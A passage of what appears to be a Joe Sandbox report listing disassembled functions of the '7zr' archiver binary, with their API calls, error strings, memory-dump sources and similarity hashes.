                                              Function 00D05BEA Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 481COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D05BEF
                                                • Part of subcall function 00D054C0: __EH_prolog.LIBCMT ref: 00D054C5
                                                • Part of subcall function 00D05630: __EH_prolog.LIBCMT ref: 00D05635
                                                • Part of subcall function 00D136EA: __EH_prolog.LIBCMT ref: 00D136EF
                                                • Part of subcall function 00D057C1: __EH_prolog.LIBCMT ref: 00D057C6
                                                • Part of subcall function 00D058BE: __EH_prolog.LIBCMT ref: 00D058C3
                                              Strings
                                              • Cannot seek to begin of file, xrefs: 00D0610F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Cannot seek to begin of file
                                              • API String ID: 3519838083-2298593816
                                              • Opcode ID: 57227eddf615c4db4a806d5393b3c69155736b2ee4616a594a9ea78263549e46
                                              • Instruction ID: f9e64f2712ef4e4cda241a8c5fd5bf4a4bc914329e4bedf7eda0caf0a534b341
                                              • Opcode Fuzzy Hash: 57227eddf615c4db4a806d5393b3c69155736b2ee4616a594a9ea78263549e46
                                              • Instruction Fuzzy Hash: 3112E1319047499FDF25DFA4C884BEEBBB5AF04314F18405DE98A572D2DB70AA44CB72
                                              Function 00D34E8A Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 468COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D34E8F
                                                • Part of subcall function 00CF965D: VariantClear.OLEAUT32(?), ref: 00CF967F
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ClearH_prologVariantfree
                                              • String ID: file
                                              • API String ID: 904627215-2359244304
                                              • Opcode ID: bd04c83c18944a0c0da0acf30504ed9564113a0180e4a640f42f9a71b3036d13
                                              • Instruction ID: 6066caef03446ac5f092396cd116ace52e1ab550926f2fa8dfcb03cd7e308d86
                                              • Opcode Fuzzy Hash: bd04c83c18944a0c0da0acf30504ed9564113a0180e4a640f42f9a71b3036d13
                                              • Instruction Fuzzy Hash: F112933490020DDFCF15EFA5C985AEDBBB6FF44344F284068E905AB252DB32AE45DB61
                                              Function 00D12CDB Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 388COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D12CE0
                                                • Part of subcall function 00CF5E10: __EH_prolog.LIBCMT ref: 00CF5E15
                                                • Part of subcall function 00D041EC: _CxxThrowException.MSVCRT(?,00DA4A58), ref: 00D0421A
                                                • Part of subcall function 00CF965D: VariantClear.OLEAUT32(?), ref: 00CF967F
                                              Strings
                                              • Cannot create output directory, xrefs: 00D13070
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$ClearExceptionThrowVariant
                                              • String ID: Cannot create output directory
                                              • API String ID: 814188403-1181934277
                                              • Opcode ID: 991c1be91a02916907652c34d6a0900a4196474f186cb03f9092a4b5f646503d
                                              • Instruction ID: c4adf070df5e5210871794ab7f117e586f48f8767d9153f3b4519569c724f11a
                                              • Opcode Fuzzy Hash: 991c1be91a02916907652c34d6a0900a4196474f186cb03f9092a4b5f646503d
                                              • Instruction Fuzzy Hash: 8FF1A030901289EFCF25EFA4D890AFDBBB5BF18300F1840A9E54567252DB31AE95DB71
                                              Function 00D2C7D7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • fputs.MSVCRT ref: 00D2C840
                                                • Part of subcall function 00CF25CB: _CxxThrowException.MSVCRT(?,00DA4A58), ref: 00CF25ED
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ExceptionThrowfputs
                                              • String ID:
                                              • API String ID: 1334390793-399585960
                                              • Opcode ID: 6b8fac48b43ed97ef0c9128b85f58bac5f0090f12213dfedb2488f7200e2ced1
                                              • Instruction ID: b4a49439f4680c324b441ae5e2482dfce69a1bfceb9d5e8a9b06e80692ccb807
                                              • Opcode Fuzzy Hash: 6b8fac48b43ed97ef0c9128b85f58bac5f0090f12213dfedb2488f7200e2ced1
                                              • Instruction Fuzzy Hash: AF11B2716147449FDB25CF58D8D1BAAFBE6EF59304F08846EE1468B251C7B1BC04C761
                                              Function 00D26086 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputs
                                              • String ID: Open
                                              • API String ID: 1795875747-71445658
                                              • Opcode ID: c31a26c68dbf701c55943e26c2f6cb9a8b4e95e1e7242392f32b7d8ba9dcc58e
                                              • Instruction ID: f76329b092fa81e9a2a7f5fea3db49ed63f1fd979827e062fe630e5a659ee5d9
                                              • Opcode Fuzzy Hash: c31a26c68dbf701c55943e26c2f6cb9a8b4e95e1e7242392f32b7d8ba9dcc58e
                                              • Instruction Fuzzy Hash: 0E11CA320007049FC760EF74E991AEABBE1EF20314B14882FE19AC3212DA31B804CF64
                                              Function 00D058BE Relevance: 3.3, APIs: 2, Instructions: 253COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D058C3
                                                • Part of subcall function 00CF6C72: __EH_prolog.LIBCMT ref: 00CF6C77
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$free
                                              • String ID:
                                              • API String ID: 2654054672-0
                                              • Opcode ID: 878ec440a46161e35f741ba60fc58f8aa534f81693b119ba451477322412bab6
                                              • Instruction ID: b4069ba3a149ab694d1c9bd25af056febd8e0d136029fa1ea5233e3ed8ad4183
                                              • Opcode Fuzzy Hash: 878ec440a46161e35f741ba60fc58f8aa534f81693b119ba451477322412bab6
                                              • Instruction Fuzzy Hash: F991C331900509DBCF21DBA4E881BFFBBB6AF44340F184069EA4AA7295DB31AD44DF71
                                              Function 00D406AE Relevance: 3.2, APIs: 2, Instructions: 206COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D406B3
                                              • _CxxThrowException.MSVCRT(?,00DAD480), ref: 00D408F2
                                                • Part of subcall function 00CF1E0C: malloc.MSVCRT ref: 00CF1E1F
                                                • Part of subcall function 00CF1E0C: _CxxThrowException.MSVCRT(?,00DA4B28), ref: 00CF1E39
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ExceptionThrow$H_prologmalloc
                                              • String ID:
                                              • API String ID: 3044594480-0
                                              • Opcode ID: dbd8444cfaf1e7339d76be1d528ad4b8f3803a4ba62fdb56aefd355844e1c34a
                                              • Instruction ID: b3f756864358082a4faa582cb21fc05fc63efa4f65addffd73ef1a25a422340e
                                              • Opcode Fuzzy Hash: dbd8444cfaf1e7339d76be1d528ad4b8f3803a4ba62fdb56aefd355844e1c34a
                                              • Instruction Fuzzy Hash: AB912A75900249DFCB21EFA8C985AEEBBB5EF09304F184199E945A7252C730AE44DFB1
                                              Function 00D07190 Relevance: 3.1, APIs: 2, Instructions: 138COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: e6b59e8d419106e319c2b98355a25bd5d6f2c7b8fa39c1477b3445c5772d6871
                                              • Instruction ID: 9fcd28e122488db46759c0d136f1de47035f8e4ce53c007d3ab17bc151148ccf
                                              • Opcode Fuzzy Hash: e6b59e8d419106e319c2b98355a25bd5d6f2c7b8fa39c1477b3445c5772d6871
                                              • Instruction Fuzzy Hash: 22516E71908B80AFDB25DB74C490BEABBF5BF45300F18895DE4DA4B282D730B984DB61
                                              Function 00D17B48 Relevance: 3.1, APIs: 2, Instructions: 122COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D17B4D
                                              • memcpy.MSVCRT(00000000,00DB27DC,00000000,00000000,?,?,00000000,00000000,00000000,00000002), ref: 00D17C65
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prologmemcpy
                                              • String ID:
                                              • API String ID: 2991061955-0
                                              • Opcode ID: 56354255f8703c1dbf712737a46f2f717db9842f2f60a523a80f84265cca8338
                                              • Instruction ID: e056fbd359659fccc55723323178862c1c57f7f6b902d66e3faf8791d8bceebc
                                              • Opcode Fuzzy Hash: 56354255f8703c1dbf712737a46f2f717db9842f2f60a523a80f84265cca8338
                                              • Instruction Fuzzy Hash: 19417C71904218EBCF20EFA4D951AEEB7F5FF04300F144529E446A72A2DB31AE89DB71
                                              Function 00D41511 Relevance: 3.0, APIs: 2, Instructions: 39COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D41516
                                                • Part of subcall function 00D410D3: __EH_prolog.LIBCMT ref: 00D410D8
                                              • _CxxThrowException.MSVCRT(?,00DAD480), ref: 00D41561
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$ExceptionThrow
                                              • String ID:
                                              • API String ID: 2366012087-0
                                              • Opcode ID: d816031a189ab73050e7c3ab486e96379c31046dbfd492c7a218330998e80c20
                                              • Instruction ID: 8552f260363e95333a1dafba3c77c0bb0bdafcbf1fbb4894cff4c75d6f8750c7
                                              • Opcode Fuzzy Hash: d816031a189ab73050e7c3ab486e96379c31046dbfd492c7a218330998e80c20
                                              • Instruction Fuzzy Hash: 4701AD36500288AFDF129F94C815BEE7FB8EF85354F04405AF4455B212C3B6E9A59BB1
                                              Function 00D257FB Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D25800
                                              • fputs.MSVCRT ref: 00D25830
                                                • Part of subcall function 00CF1FA0: fputc.MSVCRT ref: 00CF1FA7
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prologfputcfputsfree
                                              • String ID:
                                              • API String ID: 195749403-0
                                              • Opcode ID: 0de27d340731495f66f8650c193c0d2e46bfc2d0b9f59fe2c09ea1563396c20a
                                              • Instruction ID: b02972c42e890857b9310e883e1fd0524af72a66d06b2e6c5b508f98211b9940
                                              • Opcode Fuzzy Hash: 0de27d340731495f66f8650c193c0d2e46bfc2d0b9f59fe2c09ea1563396c20a
                                              • Instruction Fuzzy Hash: 2CF08232914518DFCB19FF94E406BEEBBB1FF04350F00442AF501A3191CB756995DBA9
                                              Function 00D2B5B1 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputs$fputc
                                              • String ID:
                                              • API String ID: 1185151155-0
                                              • Opcode ID: 3a6e4a3181c93a834bb00232bbe3cd1be3278f9ec7f472aa7c7a9102a42470ae
                                              • Instruction ID: ea267ac24c258f1fe0784535dd9cdad83d6cb69aed942d11cd1b05ad12e6a042
                                              • Opcode Fuzzy Hash: 3a6e4a3181c93a834bb00232bbe3cd1be3278f9ec7f472aa7c7a9102a42470ae
                                              • Instruction Fuzzy Hash: CAE0C2372092206F961A6B48BC018543BD5EBCA371329002FEB40E7360EFA33C156AB8
                                              Function 00CF950D Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SysAllocStringLen.OLEAUT32(?,?), ref: 00CF952C
                                              • _CxxThrowException.MSVCRT(?,00DA55B8), ref: 00CF954A
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: AllocExceptionStringThrow
                                              • String ID:
                                              • API String ID: 3773818493-0
                                              • Opcode ID: 6e86d25ede6a461b8987b217918881e6e348ba6bcf550ec78aeae1164e9aef29
                                              • Instruction ID: 673c5c41824a884aa492f1d608994704a3e8ee8d45f5b1f46ca1e284a4429375
                                              • Opcode Fuzzy Hash: 6e86d25ede6a461b8987b217918881e6e348ba6bcf550ec78aeae1164e9aef29
                                              • Instruction Fuzzy Hash: 94F06D72620308AFCB54EFA8D855E967BECEF05780740852AF908CB310E770E80087A0
                                              Function 00D87E00 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ErrorLast_beginthreadex
                                              • String ID:
                                              • API String ID: 4034172046-0
                                              • Opcode ID: 9d1a82d5887218a80ecc22d91f49999dcd9b5cb194540508369112c61042f6f8
                                              • Instruction ID: a28e2fca6a7306b0d6cb8fde670e706ee701d2c399ce5ac9c565662c947dc989
                                              • Opcode Fuzzy Hash: 9d1a82d5887218a80ecc22d91f49999dcd9b5cb194540508369112c61042f6f8
                                              • Instruction Fuzzy Hash: B2E0C2B22083026BF310AB60CC42F77729CEBA0B40F58847DFA49C7180E660CD00C7B1
                                              Function 00CF9C4D Relevance: 3.0, APIs: 2, Instructions: 7COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(?,?,00CF9C6E), ref: 00CF9C52
                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00CF9C59
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: Process$AffinityCurrentMask
                                              • String ID:
                                              • API String ID: 1231390398-0
                                              • Opcode ID: 77ee9214c41cdac08a57b1ee2a84f503c5ee65e4817829d8617c0766c95012d2
                                              • Instruction ID: 0fbd530629dc27f23062036b825a5de33b7d958f09f4aa07e19106ed72b9880d
                                              • Opcode Fuzzy Hash: 77ee9214c41cdac08a57b1ee2a84f503c5ee65e4817829d8617c0766c95012d2
                                              • Instruction Fuzzy Hash: D5B012B2460300FFCF00ABB0DD0DC163B2CEA043017005746F10DC2110D636C045CB70
                                              Function 00CFB668 Relevance: 2.7, APIs: 2, Instructions: 222COMMON
                                              Download Yara Rule
                                              APIs
                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00040000,?), ref: 00CFB843
                                              • GetLastError.KERNEL32 ref: 00CFB8AA
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ErrorLastmemcpy
                                              • String ID:
                                              • API String ID: 2523627151-0
                                              • Opcode ID: c69f6189b2cfce303e654345d36275b033319b8318fa4d4c11625285e6f47c04
                                              • Instruction ID: 9583ffe3b267c7500684a4f6aaad254bce24a4b1a21dbec74ea222ba6a6b0ca2
                                              • Opcode Fuzzy Hash: c69f6189b2cfce303e654345d36275b033319b8318fa4d4c11625285e6f47c04
                                              • Instruction Fuzzy Hash: 08814D31600709DFDBA8DE25C9806BAB7F6BF84354F14492EEA5687A40D730FD41CB52
                                              Function 00CF1E0C Relevance: 2.5, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ExceptionThrowmalloc
                                              • String ID:
                                              • API String ID: 2436765578-0
                                              • Opcode ID: 0c264d67ad1803ac851d1f83094e18b9ef432b9fc003b8cc57a0658b746c63fd
                                              • Instruction ID: ceab68302796fcc173d1d4a5dd3e8fc54eb44562b790f0ec19c0162fc7c233a5
                                              • Opcode Fuzzy Hash: 0c264d67ad1803ac851d1f83094e18b9ef432b9fc003b8cc57a0658b746c63fd
                                              • Instruction Fuzzy Hash: 2BE0C23010034CAECF106FA0D8087A83FA89F01765F14E015FD2C9E201C270C7D48765
                                              Function 00D3B05D Relevance: 2.2, APIs: 1, Instructions: 653COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: f60baf004fa5b48685f3d71bc3987406566c1e95d8947270d5414d00ce30b599
                                              • Instruction ID: d3c75c447df6e4c1ac44ef70df97e1c8da63cbc68fa342cfa5a196be65b4fd32
                                              • Opcode Fuzzy Hash: f60baf004fa5b48685f3d71bc3987406566c1e95d8947270d5414d00ce30b599
                                              • Instruction Fuzzy Hash: F852A070900249DFDF11CFA8C584BAEBBB5AF49314F28409AE945AB291CB75DE45CB31
                                              Function 00D06305 Relevance: 1.9, APIs: 1, Instructions: 377COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
